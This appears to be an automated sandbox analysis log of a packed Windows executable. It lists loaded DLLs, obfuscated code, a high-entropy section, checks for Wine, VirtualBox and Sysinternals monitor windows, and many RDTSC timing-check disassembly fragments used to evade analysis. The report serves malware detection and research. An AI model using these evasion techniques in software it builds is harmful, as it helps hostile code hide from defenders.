Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1798656 > 1048576
Source: file.exe | Static PE information: Raw size of cdtaybca is bigger than: 0x100000 < 0x19d200

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.440000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cdtaybca:EW;xngaqtmq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cdtaybca:EW;xngaqtmq:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00466390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00466390
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1b938c should be: 0x1c403f
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: cdtaybca
Source: file.exe | Static PE information: section name: xngaqtmq
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007FF076 push 042FF97Bh; mov dword ptr [esp], edx | 0_2_007FF0DB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007FF076 push esi; mov dword ptr [esp], ebx | 0_2_007FF11A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007FF076 push edx; mov dword ptr [esp], ecx | 0_2_007FF197
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007FF076 push esi; mov dword ptr [esp], edi | 0_2_007FF1E6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0086D094 push 0C8A10CEh; mov dword ptr [esp], ecx | 0_2_0086D0A9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008748BD push edx; mov dword ptr [esp], 3EA5858Ch | 0_2_008748E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008AE0D0 push 1829A300h; mov dword ptr [esp], edi | 0_2_008AE0DE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008AE0D0 push 32F442D4h; mov dword ptr [esp], ecx | 0_2_008AE13E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082F0E6 push esi; mov dword ptr [esp], 7C0F7476h | 0_2_0082F124
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082F0E6 push 7A302C76h; mov dword ptr [esp], ebx | 0_2_0082F133
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0082F0E6 push ebx; mov dword ptr [esp], 572978B5h | 0_2_0082F164
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0088B8ED push 6F76F111h; mov dword ptr [esp], ecx | 0_2_0088B906
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0087A806 push 0250A8B9h; mov dword ptr [esp], esi | 0_2_0087A829
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008EB81B push ebp; mov dword ptr [esp], esi | 0_2_008EB845
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008EB81B push 2C90B2D7h; mov dword ptr [esp], edi | 0_2_008EB8C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00874810 push esi; mov dword ptr [esp], 736D0040h | 0_2_0087484B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008A883D push edi; mov dword ptr [esp], 5BB6E068h | 0_2_008A8864
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008A883D push ebp; mov dword ptr [esp], esi | 0_2_008A88E4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008A883D push 1B6C37A2h; mov dword ptr [esp], edi | 0_2_008A8902
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008A883D push 6D6E6E4Dh; mov dword ptr [esp], edi | 0_2_008A894B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007FC8C4 push ecx; mov dword ptr [esp], edx | 0_2_007FC937
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007FC8C4 push ebp; mov dword ptr [esp], 57FB4FB8h | 0_2_007FCA08
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007FC8C4 push ebp; mov dword ptr [esp], ebx | 0_2_007FCAF3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007FC8C4 push 722F8096h; mov dword ptr [esp], edi | 0_2_007FCB06
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FC8C4 push ebx; mov dword ptr [esp], edi0_2_007FCB20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FC8C4 push ecx; mov dword ptr [esp], eax0_2_007FCC24
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FC8C4 push 21169314h; mov dword ptr [esp], edi0_2_007FCC9A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FC8C4 push edx; mov dword ptr [esp], ebx0_2_007FCD37
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FC8C4 push 6FC46D4Ch; mov dword ptr [esp], ebx0_2_007FCD7C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FC8C4 push 694341A3h; mov dword ptr [esp], ecx0_2_007FCE28
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FC8C4 push 4DBF01CAh; mov dword ptr [esp], esi0_2_007FCE8D
              Source: file.exeStatic PE information: section name: cdtaybca entropy: 7.954402034291771

              Boot Survival

              Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
              Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
              Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
              Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80CF92 second address: 80CFA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE8A076DDC6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80CFA1 second address: 80CFA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F712C second address: 7F7136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F7136 second address: 7F713A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C0B3 second address: 80C0C3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jng 00007FE8A076DDC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C0C3 second address: 80C0CD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE8A0813DA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C0CD second address: 80C0D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C0D3 second address: 80C0F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE8A0813DB3h 0x00000008 jl 00007FE8A0813DA6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C3F9 second address: 80C422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 je 00007FE8A076DDD6h 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FE8A076DDC6h 0x00000013 jns 00007FE8A076DDC6h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C552 second address: 80C558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C558 second address: 80C55C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C7F7 second address: 80C7FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80C7FB second address: 80C807 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FE8A076DDC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810465 second address: 8104A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A0813DAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FE8A0813DA8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov di, si 0x00000029 push 2CB18A69h 0x0000002e pushad 0x0000002f jbe 00007FE8A0813DACh 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8104A5 second address: 810524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FE8A076DDC8h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d xor dword ptr [esp], 2CB18AE9h 0x00000014 mov dword ptr [ebp+122D1939h], edx 0x0000001a push 00000003h 0x0000001c sbb dx, 247Fh 0x00000021 call 00007FE8A076DDD5h 0x00000026 add di, 88C8h 0x0000002b pop edx 0x0000002c push 00000000h 0x0000002e push 00000003h 0x00000030 mov edi, edx 0x00000032 call 00007FE8A076DDC9h 0x00000037 ja 00007FE8A076DDE5h 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FE8A076DDCCh 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810524 second address: 810562 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FE8A0813DB9h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FE8A0813DB7h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810562 second address: 810583 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE8A076DDD3h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810583 second address: 81058D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE8A0813DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81058D second address: 8105FC instructions: 0x00000000 rdtsc 0x00000002 je 00007FE8A076DDD8h 0x00000008 jmp 00007FE8A076DDD2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 jmp 00007FE8A076DDD6h 0x00000018 pop eax 0x00000019 lea ebx, dword ptr [ebp+12454316h] 0x0000001f push 00000000h 0x00000021 push eax 0x00000022 call 00007FE8A076DDC8h 0x00000027 pop eax 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c add dword ptr [esp+04h], 0000001Dh 0x00000034 inc eax 0x00000035 push eax 0x00000036 ret 0x00000037 pop eax 0x00000038 ret 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d pushad 0x0000003e popad 0x0000003f jnp 00007FE8A076DDC6h 0x00000045 popad 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810665 second address: 81066A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81066A second address: 8106C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE8A076DDD9h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push edx 0x00000011 jmp 00007FE8A076DDD7h 0x00000016 pop edx 0x00000017 push 00000000h 0x00000019 sub esi, dword ptr [ebp+122D35FFh] 0x0000001f call 00007FE8A076DDC9h 0x00000024 push eax 0x00000025 push edx 0x00000026 jns 00007FE8A076DDC8h 0x0000002c push edi 0x0000002d pop edi 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8106C2 second address: 8106D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE8A0813DAEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8106D4 second address: 8106EF instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE8A076DDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d je 00007FE8A076DDD4h 0x00000013 push eax 0x00000014 push edx 0x00000015 jp 00007FE8A076DDC6h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8106EF second address: 810727 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a js 00007FE8A0813DB9h 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007FE8A0813DAAh 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f pop esi 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810727 second address: 810750 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A076DDCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE8A076DDD5h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810750 second address: 8107AA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 call 00007FE8A0813DABh 0x0000000d mov edi, dword ptr [ebp+122D37E7h] 0x00000013 pop ecx 0x00000014 push 00000003h 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007FE8A0813DA8h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 push 00000000h 0x00000032 or edx, dword ptr [ebp+122D35EFh] 0x00000038 push 00000003h 0x0000003a sub dword ptr [ebp+122D19F2h], edx 0x00000040 push 92EE277Fh 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 push ecx 0x00000049 pop ecx 0x0000004a jl 00007FE8A0813DA6h 0x00000050 popad 0x00000051 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8108FA second address: 810913 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop ecx 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810913 second address: 810918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810918 second address: 81091E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81091E second address: 810922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810922 second address: 810935 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b jc 00007FE8A076DDCCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 810935 second address: 8109B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 jmp 00007FE8A0813DB0h 0x0000000e pop eax 0x0000000f jmp 00007FE8A0813DB7h 0x00000014 clc 0x00000015 lea ebx, dword ptr [ebp+1245432Ah] 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007FE8A0813DA8h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 push edx 0x00000036 pushad 0x00000037 mov dword ptr [ebp+122D1AFAh], esi 0x0000003d jmp 00007FE8A0813DACh 0x00000042 popad 0x00000043 pop edi 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jnl 00007FE8A0813DACh 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F3F6 second address: 82F3FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F3FC second address: 82F400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F400 second address: 82F40A instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE8A076DDC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82F6E8 second address: 82F6ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83008C second address: 830090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830090 second address: 830094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830094 second address: 8300A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007FE8A076DDDAh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83024D second address: 830253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830253 second address: 830259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83038B second address: 8303A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FE8A0813DA6h 0x0000000a jmp 00007FE8A0813DB2h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8303A9 second address: 8303C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FE8A076DDD8h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82732A second address: 827330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 827330 second address: 82733E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FE8A076DDC6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83054C second address: 830570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE8A0813DB5h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jo 00007FE8A0813DA6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830570 second address: 83058C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A076DDD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830C6F second address: 830C73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830F12 second address: 830F18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8321DC second address: 8321E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8321E0 second address: 832214 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE8A076DDD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a je 00007FE8A076DDC6h 0x00000010 pop eax 0x00000011 popad 0x00000012 push eax 0x00000013 jo 00007FE8A076DDE4h 0x00000019 push eax 0x0000001a push edx 0x0000001b je 00007FE8A076DDC6h 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8339A1 second address: 8339D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE8A0813DAAh 0x00000009 popad 0x0000000a jp 00007FE8A0813DACh 0x00000010 popad 0x00000011 push eax 0x00000012 jbe 00007FE8A0813DAAh 0x00000018 push edi 0x00000019 pushad 0x0000001a popad 0x0000001b pop edi 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jnc 00007FE8A0813DA6h 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8339D6 second address: 8339E0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE8A076DDC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 837212 second address: 83721A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83721A second address: 83722F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop ecx 0x0000000c push edx 0x0000000d jng 00007FE8A076DDCCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 839517 second address: 83951B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83AA01 second address: 83AA05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83AA05 second address: 83AA0F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE8A0813DA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83D5F5 second address: 83D60B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE8A076DDCEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
